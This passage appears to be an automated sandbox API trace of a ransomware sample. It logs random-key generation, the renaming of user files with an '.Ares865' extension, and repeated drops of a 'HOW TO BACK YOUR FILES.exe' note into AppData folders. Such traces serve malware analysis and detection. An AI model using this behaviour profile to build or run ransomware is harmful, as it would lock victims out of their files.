dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.913] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=87) returned 1 [0108.913] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0108.914] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.914] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0108.925] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0108.926] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.926] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0108.926] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865") returned 192 [0108.926] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.ares865"), dwFlags=0x1) returned 1 [0108.932] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.933] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=61) returned 1 [0108.933] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0108.933] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.934] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0108.973] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0109.017] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.017] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0109.018] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Credentials" [0109.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0109.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0109.018] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Credentials") returned 68 [0109.018] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Credentials" [0109.018] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.018] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.019] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.019] GetLastError () returned 0x0 [0109.020] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\AddIns", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\AddIns") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\AddIns" [0109.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0109.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0109.020] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\AddIns") returned 63 [0109.020] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\AddIns" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\AddIns") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\AddIns" [0109.020] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.020] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\AddIns\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\addins\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.021] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.021] GetLastError () returned 0x0 [0109.021] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia" [0109.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1408 | out: hHeap=0x2b0000) returned 1 [0109.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0109.021] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia") returned 57 [0109.021] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia" [0109.022] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.022] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\macromedia\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.022] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.023] GetLastError () returned 0x0 [0109.023] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player" [0109.023] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0109.023] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0109.023] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player") returned 70 [0109.023] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player" [0109.023] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.023] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\macromedia\\flash player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.024] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.024] GetLastError () returned 0x0 [0109.024] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com" [0109.024] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0109.024] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0109.024] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com") returned 85 [0109.024] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com" [0109.024] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.024] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\macromedia\\flash player\\macromedia.com\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.025] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.025] GetLastError () returned 0x0 [0109.026] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support" [0109.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0109.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0109.026] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support") returned 93 [0109.026] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support" [0109.026] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.026] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\macromedia\\flash player\\macromedia.com\\support\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.026] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.027] GetLastError () returned 0x0 [0109.027] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0109.027] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0109.027] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0109.027] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned 105 [0109.027] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0109.027] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.027] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.028] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.028] GetLastError () returned 0x0 [0109.028] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0109.028] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x338fc8 | out: hHeap=0x2b0000) returned 1 [0109.028] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0109.028] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 109 [0109.029] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0109.029] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.029] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.029] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.030] GetLastError () returned 0x0 [0109.030] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.Ares865") returned 130 [0109.030] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.ares865"), dwFlags=0x1) returned 1 [0109.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0109.032] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=470) returned 1 [0109.032] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0109.033] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0109.033] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.045] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0109.051] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0109.051] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0109.052] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects" [0109.052] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8890 | out: hHeap=0x2b0000) returned 1 [0109.052] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0109.052] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects") returned 85 [0109.052] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects" [0109.052] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.052] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\macromedia\\flash player\\#sharedobjects\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.053] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.053] GetLastError () returned 0x0 [0109.054] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB" [0109.054] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0109.054] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0109.054] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB") returned 94 [0109.054] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB" [0109.054] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.054] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\macromedia\\flash player\\#sharedobjects\\p7y3f7qb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.054] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 